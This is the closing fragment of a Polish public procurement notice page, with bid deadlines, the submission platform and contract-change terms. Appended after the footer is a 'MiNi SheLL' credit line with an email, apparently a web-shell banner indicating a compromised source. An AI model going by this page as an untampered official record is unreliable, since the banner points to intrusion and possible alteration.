załącznik nr 6 do SWZ. Zamawiający zastrzega, iż ostateczna treść umowy w stosunku do projektu umowy może ulec zmianie, jednakże wyłącznie w zakresie nie zmieniającym istotnych warunków złożonej oferty i SWZ. Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej umowy w sprawie zamówienia publicznego, w sposób i na warunkach określonych we wzorze umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-17 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/swws</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-17 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-15</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-08-09 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com